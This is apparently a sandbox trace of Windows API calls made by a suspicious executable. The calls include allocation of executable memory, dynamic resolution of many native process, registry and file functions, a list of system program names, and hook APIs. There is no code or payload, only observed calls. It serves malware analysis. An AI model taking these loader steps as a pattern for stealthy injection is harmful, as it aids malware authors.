(dwErrCode=0x0) [0157.862] GetLastError () returned 0x0 [0157.863] SetLastError (dwErrCode=0x0) [0158.031] GetLastError () returned 0x0 [0158.032] SetLastError (dwErrCode=0x0) [0158.032] GetLastError () returned 0x0 [0158.032] SetLastError (dwErrCode=0x0) [0158.032] GetLastError () returned 0x0 [0158.032] SetLastError (dwErrCode=0x0) [0158.032] GetLastError () returned 0x0 [0158.033] SetLastError (dwErrCode=0x0) [0158.033] GetLastError () returned 0x0 [0158.033] SetLastError (dwErrCode=0x0) [0158.033] GetLastError () returned 0x0 [0158.033] SetLastError (dwErrCode=0x0) [0158.033] GetLastError () returned 0x0 [0158.034] SetLastError (dwErrCode=0x0) [0158.204] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0158.204] GetLastError () returned 0x0 [0158.205] SetLastError (dwErrCode=0x0) [0158.205] GetLastError () returned 0x0 [0158.205] SetLastError (dwErrCode=0x0) [0158.205] GetLastError () returned 0x0 [0158.205] SetLastError (dwErrCode=0x0) [0158.205] GetLastError () returned 0x0 [0158.206] SetLastError (dwErrCode=0x0) [0158.206] GetLastError () returned 0x0 [0158.206] SetLastError (dwErrCode=0x0) [0158.206] GetLastError () returned 0x0 [0158.206] SetLastError (dwErrCode=0x0) [0158.347] GetLastError () returned 0x0 [0158.347] SetLastError (dwErrCode=0x0) [0158.347] GetLastError () returned 0x0 [0158.347] SetLastError (dwErrCode=0x0) [0158.347] GetLastError () returned 0x0 [0158.347] SetLastError (dwErrCode=0x0) [0158.348] GetLastError () returned 0x0 [0158.348] SetLastError (dwErrCode=0x0) [0158.348] GetLastError () returned 0x0 [0158.348] SetLastError (dwErrCode=0x0) [0158.348] GetLastError () returned 0x0 [0158.348] SetLastError (dwErrCode=0x0) [0158.348] GetLastError () returned 0x0 [0158.348] SetLastError (dwErrCode=0x0) [0158.475] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x340000 [0158.475] GetLastError () returned 0x0 [0158.475] SetLastError (dwErrCode=0x0) [0158.475] GetLastError () returned 0x0 [0158.476] SetLastError (dwErrCode=0x0) [0158.476] GetLastError () returned 0x0 [0158.476] SetLastError (dwErrCode=0x0) [0158.476] GetLastError () returned 0x0 [0158.476] SetLastError (dwErrCode=0x0) [0158.650] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0158.650] GetLastError () returned 0x0 [0158.650] SetLastError (dwErrCode=0x0) [0158.651] GetLastError () returned 0x0 [0158.651] SetLastError (dwErrCode=0x0) [0158.651] GetLastError () returned 0x0 [0158.651] SetLastError (dwErrCode=0x0) [0158.651] GetLastError () returned 0x0 [0158.652] SetLastError (dwErrCode=0x0) [0158.868] GetProcAddress (hModule=0x75a80000, lpProcName="GetProcAddress") returned 0x75a91222 [0158.868] GetLastError () returned 0x0 [0158.868] SetLastError (dwErrCode=0x0) [0158.868] GetLastError () returned 0x0 [0158.869] SetLastError (dwErrCode=0x0) [0158.869] GetLastError () returned 0x0 [0158.869] SetLastError (dwErrCode=0x0) [0158.869] GetLastError () returned 0x0 [0158.869] SetLastError (dwErrCode=0x0) [0159.105] GetLastError () returned 0x0 [0159.105] SetLastError (dwErrCode=0x0) [0159.105] GetLastError () returned 0x0 [0159.105] SetLastError (dwErrCode=0x0) [0159.106] GetLastError () returned 0x0 [0159.106] SetLastError (dwErrCode=0x0) [0159.106] GetLastError () returned 0x0 [0159.106] SetLastError (dwErrCode=0x0) [0159.106] GetLastError () returned 0x0 [0159.106] SetLastError (dwErrCode=0x0) [0159.106] GetLastError () returned 0x0 [0159.106] SetLastError (dwErrCode=0x0) [0159.106] GetLastError () returned 0x0 [0159.107] SetLastError (dwErrCode=0x0) [0159.280] GetLastError () returned 0x0 [0159.280] SetLastError (dwErrCode=0x0) [0159.280] GetLastError () returned 0x0 [0159.281] SetLastError (dwErrCode=0x0) [0159.281] GetLastError () returned 0x0 [0159.282] SetLastError (dwErrCode=0x0) [0159.282] GetLastError () returned 0x0 [0159.282] SetLastError (dwErrCode=0x0) [0159.282] GetLastError () returned 0x0 [0159.282] SetLastError (dwErrCode=0x0) [0159.282] GetLastError () returned 0x0 [0159.282] SetLastError (dwErrCode=0x0) [0159.282] GetLastError () returned 0x0 [0159.283] SetLastError (dwErrCode=0x0) [0159.283] GetLastError () returned 0x0 [0159.283] SetLastError (dwErrCode=0x0) [0159.429] GetLastError () returned 0x0 [0159.429] SetLastError (dwErrCode=0x0) [0159.429] GetProcAddress (hModule=0x77a60000, lpProcName="ZwClose") returned 0x77a7f9d0 [0159.429] GetLastError () returned 0x0 [0159.430] SetLastError (dwErrCode=0x0) [0159.584] GetLastError () returned 0x0 [0159.584] SetLastError (dwErrCode=0x0) [0159.584] GetLastError () returned 0x0 [0159.584] SetLastError (dwErrCode=0x0) [0159.584] GetLastError () returned 0x0 [0159.585] SetLastError (dwErrCode=0x0) [0159.585] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateFile") returned 0x77a800a4 [0159.585] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenFile") returned 0x77a7fd54 [0159.585] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateSection") returned 0x77a7ff94 [0159.586] GetProcAddress (hModule=0x77a60000, lpProcName="ZwMapViewOfSection") returned 0x77a7fc40 [0159.586] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnmapViewOfSection") returned 0x77a7fc70 [0159.586] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnmapViewOfSectionEx") returned 0x0 [0159.586] GetProcAddress (hModule=0x77a60000, lpProcName="ZwReadFile") returned 0x77a7f8e0 [0159.587] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationFile") returned 0x77a7fa00 [0159.587] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationFile") returned 0x77a7fc28 [0159.587] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryAttributesFile") returned 0x77a7fe4c [0159.587] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQuerySection") returned 0x77a80040 [0159.588] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryFullAttributesFile") returned 0x77a8132c [0159.588] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWriteFile") returned 0x77a7f918 [0159.595] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeviceIoControlFile") returned 0x77a7f8fc [0159.596] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationObject") returned 0x77a80154 [0159.596] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryObject") returned 0x77a7f9e8 [0159.596] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryDirectoryFile") returned 0x77a7fd88 [0159.596] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryDirectoryFileEx") returned 0x0 [0159.596] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenSection") returned 0x77a7fdb8 [0159.597] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDuplicateObject") returned 0x77a7fe34 [0159.597] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteFile") returned 0x77a809d4 [0159.597] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLockFile") returned 0x77a80e44 [0159.597] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnlockFile") returned 0x77a81ea8 [0159.597] GetProcAddress (hModule=0x77a60000, lpProcName="ZwTerminateProcess") returned 0x77a7fca0 [0159.598] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryVirtualMemory") returned 0x77a7fbc8 [0159.598] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryVolumeInformationFile") returned 0x77a7ff7c [0159.598] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetVolumeInformationFile") returned 0x77a81c8c [0159.598] GetProcAddress (hModule=0x77a60000, lpProcName="ZwAccessCheck") returned 0x77a80218 [0159.598] GetProcAddress (hModule=0x77a60000, lpProcName="ZwExtendSection") returned 0x77a80b0c [0159.599] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushBuffersFile") returned 0x77a7ffac [0159.599] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFsControlFile") returned 0x77a7fde8 [0159.599] GetProcAddress (hModule=0x77a60000, lpProcName="ZwNotifyChangeDirectoryFile") returned 0x77a80f48 [0159.599] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQuerySecurityObject") returned 0x77a81518 [0159.599] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetSecurityObject") returned 0x77a81b8c [0159.600] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateProcess") returned 0x77a80804 [0159.600] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateProcessEx") returned 0x77a7ffdc [0159.600] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateUserProcess") returned 0x77a8090c [0159.600] GetProcAddress (hModule=0x77a60000, lpProcName="ZwResumeThread") returned 0x77a80058 [0159.600] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateThread") returned 0x77a7fff4 [0159.601] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationProcess") returned 0x77a7fac8 [0159.601] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenKey") returned 0x77a7fa18 [0159.601] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenKeyEx") returned 0x77a81008 [0159.601] GetProcAddress (hModule=0x77a60000, lpProcName="ZwEnumerateValueKey") returned 0x77a7fa30 [0159.601] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryKey") returned 0x77a7fa80 [0159.602] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryValueKey") returned 0x77a7fa98 [0159.602] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateKey") returned 0x77a7fb30 [0159.602] GetProcAddress (hModule=0x77a60000, lpProcName="ZwEnumerateKey") returned 0x77a7fd3c [0159.602] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetValueKey") returned 0x77a801b4 [0159.603] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteKey") returned 0x77a809ec [0159.603] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteValueKey") returned 0x77a80a34 [0159.603] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushKey") returned 0x77a80b70 [0159.603] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLoadKey") returned 0x77a80dfc [0159.604] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLoadKey2") returned 0x77a80e14 [0159.604] GetProcAddress (hModule=0x77a60000, lpProcName="ZwNotifyChangeKey") returned 0x77a80f60 [0159.604] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryMultipleValueKey") returned 0x77a8146c [0159.604] GetProcAddress (hModule=0x77a60000, lpProcName="ZwReplaceKey") returned 0x77a81738 [0159.604] GetProcAddress (hModule=0x77a60000, lpProcName="ZwRestoreKey") returned 0x77a817d0 [0159.604] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSaveKey") returned 0x77a81864 [0159.605] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationKey") returned 0x77a81a48 [0159.605] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnloadKey") returned 0x77a81e60 [0159.605] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWaitForMultipleObjects") returned 0x77a80138 [0159.605] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWaitForSingleObject") returned 0x77a7f8ac [0159.605] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCopyFileChunk") returned 0x0 [0159.605] GetLastError () returned 0x7f [0159.606] SetLastError (dwErrCode=0x7f) [0159.606] GetLastError () returned 0x7f [0159.606] SetLastError (dwErrCode=0x7f) [0159.606] GetLastError () returned 0x7f [0159.606] SetLastError (dwErrCode=0x7f) [0159.606] GetLastError () returned 0x7f [0159.606] SetLastError (dwErrCode=0x7f) [0159.748] VirtualFree (lpAddress=0x340000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0159.748] GetLastError () returned 0x7f [0159.749] SetLastError (dwErrCode=0x7f) [0159.749] GetLastError () returned 0x7f [0159.749] SetLastError (dwErrCode=0x7f) [0159.749] GetLastError () returned 0x7f [0159.749] SetLastError (dwErrCode=0x7f) [0159.749] GetLastError () returned 0x7f [0159.749] SetLastError (dwErrCode=0x7f) [0160.513] SysReAllocStringLen (in: pbstr=0x54e944*=0x0, psz="Registry", len=0x8 | out: pbstr=0x54e944*="Registry") returned 1 [0160.513] SysReAllocStringLen (in: pbstr=0x54e940*=0x0, psz="File", len=0x4 | out: pbstr=0x54e940*="File") returned 1 [0160.513] SysReAllocStringLen (in: pbstr=0x54dd3c*=0x0, psz="tcpsvcs.exe", len=0xb | out: pbstr=0x54dd3c*="tcpsvcs.exe") returned 1 [0160.513] SysReAllocStringLen (in: pbstr=0x54dd38*=0x0, psz="ntvdm.exe", len=0x9 | out: pbstr=0x54dd38*="ntvdm.exe") returned 1 [0160.513] SysReAllocStringLen (in: pbstr=0x54dd34*=0x0, psz="dllhost.exe", len=0xb | out: pbstr=0x54dd34*="dllhost.exe") returned 1 [0160.513] SysReAllocStringLen (in: pbstr=0x54dd30*=0x0, psz="replace.exe", len=0xb | out: pbstr=0x54dd30*="replace.exe") returned 1 [0160.513] SysReAllocStringLen (in: pbstr=0x54dd2c*=0x0, psz="regsvr32.exe", len=0xc | out: pbstr=0x54dd2c*="regsvr32.exe") returned 1 [0160.513] SysReAllocStringLen (in: pbstr=0x54dd28*=0x0, psz="winver.exe", len=0xa | out: pbstr=0x54dd28*="winver.exe") returned 1 [0160.513] SysReAllocStringLen (in: pbstr=0x54dd24*=0x0, psz="help.exe", len=0x8 | out: pbstr=0x54dd24*="help.exe") returned 1 [0160.513] SysReAllocStringLen (in: pbstr=0x54dd20*=0x0, psz="find.exe", len=0x8 | out: pbstr=0x54dd20*="find.exe") returned 1 [0160.513] SysReAllocStringLen (in: pbstr=0x54dd1c*=0x0, psz="compact.exe", len=0xb | out: pbstr=0x54dd1c*="compact.exe") returned 1 [0160.513] SysReAllocStringLen (in: pbstr=0x54dd18*=0x0, psz="chkdsk.exe", len=0xa | out: pbstr=0x54dd18*="chkdsk.exe") returned 1 [0160.513] SysReAllocStringLen (in: pbstr=0x54dd14*=0x0, psz="attrib.exe", len=0xa | out: pbstr=0x54dd14*="attrib.exe") returned 1 [0160.514] SysReAllocStringLen (in: pbstr=0x54dd10*=0x0, psz="write.exe", len=0x9 | out: pbstr=0x54dd10*="write.exe") returned 1 [0160.514] SysReAllocStringLen (in: pbstr=0x54dd0c*=0x0, psz="hh.exe", len=0x6 | out: pbstr=0x54dd0c*="hh.exe") returned 1 [0160.514] QueryPerformanceCounter (in: lpPerformanceCount=0x28fecc | out: lpPerformanceCount=0x28fecc*=3064134218444) returned 1 [0161.270] GetLastError () returned 0x0 [0161.270] SetLastError (dwErrCode=0x0) [0161.270] GetLastError () returned 0x0 [0161.271] SetLastError (dwErrCode=0x0) [0161.271] GetLastError () returned 0x0 [0161.271] SetLastError (dwErrCode=0x0) [0161.271] GetLastError () returned 0x0 [0161.271] SetLastError (dwErrCode=0x0) [0161.271] GetLastError () returned 0x0 [0161.271] SetLastError (dwErrCode=0x0) [0161.271] GetLastError () returned 0x0 [0161.271] SetLastError (dwErrCode=0x0) [0161.272] GetLastError () returned 0x0 [0161.272] SetLastError (dwErrCode=0x0) [0161.385] GetLastError () returned 0x0 [0161.385] SetLastError (dwErrCode=0x0) [0161.385] GetLastError () returned 0x0 [0161.386] SetLastError (dwErrCode=0x0) [0161.386] GetLastError () returned 0x0 [0161.386] SetLastError (dwErrCode=0x0) [0161.386] GetLastError () returned 0x0 [0161.386] SetLastError (dwErrCode=0x0) [0161.496] GetLastError () returned 0x0 [0161.496] SetLastError (dwErrCode=0x0) [0161.496] GetLastError () returned 0x0 [0161.497] SetLastError (dwErrCode=0x0) [0161.497] GetLastError () returned 0x0 [0161.497] SetLastError (dwErrCode=0x0) [0161.497] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.497] GetLastError () returned 0x0 [0161.497] SetLastError (dwErrCode=0x0) [0161.645] GetLastError () returned 0x0 [0161.645] SetLastError (dwErrCode=0x0) [0161.645] GetLastError () returned 0x0 [0161.645] SetLastError (dwErrCode=0x0) [0161.645] GetLastError () returned 0x0 [0161.645] SetLastError (dwErrCode=0x0) [0161.648] GetLastError () returned 0x0 [0161.648] SetLastError (dwErrCode=0x0) [0161.648] GetLastError () returned 0x0 [0161.648] SetLastError (dwErrCode=0x0) [0161.648] GetLastError () returned 0x0 [0161.649] SetLastError (dwErrCode=0x0) [0161.753] GetLastError () returned 0x0 [0161.753] SetLastError (dwErrCode=0x0) [0161.753] GetLastError () returned 0x0 [0161.753] SetLastError (dwErrCode=0x0) [0161.754] GetProcAddress (hModule=0x75a80000, lpProcName="GetModuleHandleA") returned 0x75a91245 [0161.754] GetLastError () returned 0x0 [0161.754] SetLastError (dwErrCode=0x0) [0161.861] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.861] GetProcAddress (hModule=0x75a80000, lpProcName="GetModuleHandleW") returned 0x75a93460 [0161.861] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.862] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileA") returned 0x75a9537e [0161.862] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.862] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileW") returned 0x75a93f0c [0161.862] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.862] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileMappingA") returned 0x75a954be [0161.862] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.862] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileMappingW") returned 0x75a918e9 [0161.863] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.863] GetProcAddress (hModule=0x75a80000, lpProcName="ReadFile") returned 0x75a93e83 [0161.863] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.863] GetProcAddress (hModule=0x75a80000, lpProcName="CloseHandle") returned 0x75a913f0 [0161.863] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.863] GetProcAddress (hModule=0x75a80000, lpProcName="GetFileSize") returned 0x75a9194e [0161.864] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.864] GetProcAddress (hModule=0x75a80000, lpProcName="SetFilePointer") returned 0x75a917b1 [0161.864] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.864] GetProcAddress (hModule=0x75a80000, lpProcName="MapViewOfFile") returned 0x75a918d1 [0161.864] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.864] GetProcAddress (hModule=0x75a80000, lpProcName="MapViewOfFileEx") returned 0x75a94c3b [0161.864] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.865] GetProcAddress (hModule=0x75a80000, lpProcName="UnmapViewOfFile") returned 0x75a91806 [0161.865] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.865] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryA") returned 0x75a9498f [0161.865] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.865] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryExA") returned 0x75a948cb [0161.865] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.865] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryW") returned 0x75a948e3 [0161.867] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.867] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryExW") returned 0x75a94915 [0161.867] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.867] GetProcAddress (hModule=0x75a80000, lpProcName="FreeLibrary") returned 0x75a93478 [0161.867] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.867] GetProcAddress (hModule=0x75a80000, lpProcName="FreeResource") returned 0x75aad3ab [0161.867] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.868] GetProcAddress (hModule=0x75a80000, lpProcName="GetVersion") returned 0x75a9441f [0161.868] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.868] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentProcessId") returned 0x75a911f8 [0161.868] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.868] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentProcess") returned 0x75a917e9 [0161.868] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.869] GetProcAddress (hModule=0x75a80000, lpProcName="GetCommandLineA") returned 0x75a95159 [0161.869] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.869] GetProcAddress (hModule=0x75a80000, lpProcName="GetCommandLineW") returned 0x75a951db [0161.869] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.869] GetProcAddress (hModule=0x75a80000, lpProcName="LockResource") returned 0x75a95911 [0161.869] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.870] GetProcAddress (hModule=0x75a80000, lpProcName="GetProcAddress") returned 0x75a91222 [0161.870] GetLastError () returned 0x0 [0161.870] SetLastError (dwErrCode=0x0) [0161.870] GetLastError () returned 0x0 [0161.870] SetLastError (dwErrCode=0x0) [0161.870] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.870] GetLastError () returned 0x0 [0161.870] SetLastError (dwErrCode=0x0) [0161.871] GetLastError () returned 0x0 [0161.871] SetLastError (dwErrCode=0x0) [0161.871] GetLastError () returned 0x0 [0161.871] SetLastError (dwErrCode=0x0) [0161.871] GetLastError () returned 0x0 [0161.871] SetLastError (dwErrCode=0x0) [0161.871] GetLastError () returned 0x0 [0161.871] SetLastError (dwErrCode=0x0) [0161.990] GetProcAddress (hModule=0x75a80000, lpProcName="UnhandledExceptionFilter") returned 0x75ab76f7 [0161.991] GetLastError () returned 0x0 [0161.991] SetLastError (dwErrCode=0x0) [0161.991] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.992] GetProcAddress (hModule=0x75a80000, lpProcName="DebugBreak") returned 0x75b14755 [0161.992] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.994] GetProcAddress (hModule=0x75a80000, lpProcName="FatalAppExitA") returned 0x75b14c31 [0161.994] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0161.994] GetProcAddress (hModule=0x75a80000, lpProcName="RtlRaiseException") returned 0x0 [0161.994] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0161.995] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowsHookExA") returned 0x759a835c [0161.995] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0161.995] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowsHookExW") returned 0x759a7603 [0161.995] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0161.995] GetProcAddress (hModule=0x75980000, lpProcName="UnhookWindowsHookEx") returned 0x759bf52b [0161.995] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0161.995] GetProcAddress (hModule=0x75980000, lpProcName="PeekMessageA") returned 0x759a5f74 [0161.996] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0161.996] GetProcAddress (hModule=0x75980000, lpProcName="CallNextHookEx") returned 0x759a6285 [0161.996] GetLastError () returned 0x7f [0161.996] SetLastError (dwErrCode=0x7f) [0163.337] HeapCreate (flOptions=0x0, dwInitialSize=0x88000, dwMaximumSize=0x88000) returned 0x36b0000 [0163.342] RtlAllocateHeap (HeapHandle=0x36b0000, Flags=0x0, Size=0x10000) returned 0x36b0590 [0163.342] RtlAllocateHeap (HeapHandle=0x36b0000, Flags=0x0, Size=0x10000) returned 0x36c0598 [0163.342] RtlAllocateHeap (HeapHandle=0x36b0000, Flags=0x0, Size=0x10000) returned 0x36d05a0 [0163.342] RtlAllocateHeap (HeapHandle=0x36b0000, Flags=0x0, Size=0x10000) returned 0x36e05a8 [0163.342] RtlAllocateHeap (HeapHandle=0x36b0000, Flags=0x0, Size=0x10000) returned 0x36f05b0 [0163.342] RtlAllocateHeap (HeapHandle=0x36b0000, Flags=0x0, Size=0x10000) returned 0x37005b8 [0163.343] RtlAllocateHeap (HeapHandle=0x36b0000, Flags=0x0, Size=0x10000) returned 0x37105c0 [0163.343] RtlAllocateHeap (HeapHandle=0x36b0000, Flags=0x0, Size=0x10000) returned 0x37205c8 [0163.343] GetLastError () returned 0x7f [0163.343] SetLastError (dwErrCode=0x7f) [0163.343] GetLastError () returned 0x7f [0163.344] SetLastError (dwErrCode=0x7f) [0163.344] GetLastError () returned 0x7f [0163.344] SetLastError (dwErrCode=0x7f) [0163.344] VirtualAlloc (lpAddress=0x2ad4000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x2ad4000 [0163.347] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0163.347] GetProcAddress (hModule=0x75a80000, lpProcName="GetVersionExA") returned 0x75a934c9 [0163.352] GetVersionExA (in: lpVersionInformation=0x28fc5c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x28fc78, dwMinorVersion=0x4, dwBuildNumber=0x42ed7e, dwPlatformId=0x28fca0, szCSDVersion="") | out: lpVersionInformation=0x28fc5c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0163.352] VirtualAlloc (lpAddress=0x2ae4000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x40) returned 0x2ae4000 [0163.355] GetSystemDirectoryW (in: lpBuffer=0x2ae1c98, uSize=0xfffe | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0163.355] SysReAllocStringLen (in: pbstr=0x28fdcc*=0x0, psz="C:\\Windows\\system32", len=0x13 | out: pbstr=0x28fdcc*="C:\\Windows\\system32") returned 1 [0163.355] SysReAllocStringLen (in: pbstr=0x28fdd0*=0x0, psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x28fdd0*="C:\\Windows\\system32\\") returned 1 [0163.355] GetThreadLocale () returned 0x409 [0163.355] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\system32\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0163.355] GetThreadLocale () returned 0x409 [0163.356] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\system32\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0163.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Windows\\system32\\", lpFilePart=0x28fa90*=0x0) returned 0x14 [0163.356] SysReAllocStringLen (in: pbstr=0x28fdd0*="C:\\Windows\\system32\\", psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x28fdd0*="C:\\Windows\\system32\\") returned 1 [0163.356] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x28fcc0*="C:\\Windows\\system32\\") returned 1 [0163.356] CharLowerBuffW (in: lpsz="C:\\Windows\\system32\\", cchLength=0x14 | out: lpsz="c:\\windows\\system32\\") returned 0x14 [0163.356] SysReAllocStringLen (in: pbstr=0x28fdd0*="C:\\Windows\\system32\\", psz="c:\\windows\\system32\\", len=0x14 | out: pbstr=0x28fdd0*="c:\\windows\\system32\\") returned 1 [0163.357] SysReAllocStringLen (in: pbstr=0x2ad25b4*=0x0, psz="c:\\windows\\system32\\", len=0x14 | out: pbstr=0x2ad25b4*="c:\\windows\\system32\\") returned 1 [0163.357] GetWindowsDirectoryW (in: lpBuffer=0x2ae1c98, uSize=0xfffe | out: lpBuffer="C:\\Windows") returned 0xa [0163.357] SysReAllocStringLen (in: pbstr=0x28fdc0*=0x0, psz="C:\\Windows", len=0xa | out: pbstr=0x28fdc0*="C:\\Windows") returned 1 [0163.357] SysReAllocStringLen (in: pbstr=0x28fdc4*=0x0, psz="C:\\Windows\\", len=0xb | out: pbstr=0x28fdc4*="C:\\Windows\\") returned 1 [0163.357] GetThreadLocale () returned 0x409 [0163.357] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0163.357] GetThreadLocale () returned 0x409 [0163.357] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0163.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Windows\\", lpFilePart=0x28fa90*=0x0) returned 0xb [0163.358] SysReAllocStringLen (in: pbstr=0x28fdc4*="C:\\Windows\\", psz="C:\\Windows\\", len=0xb | out: pbstr=0x28fdc4*="C:\\Windows\\") returned 1 [0163.358] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Windows\\", len=0xb | out: pbstr=0x28fcc0*="C:\\Windows\\") returned 1 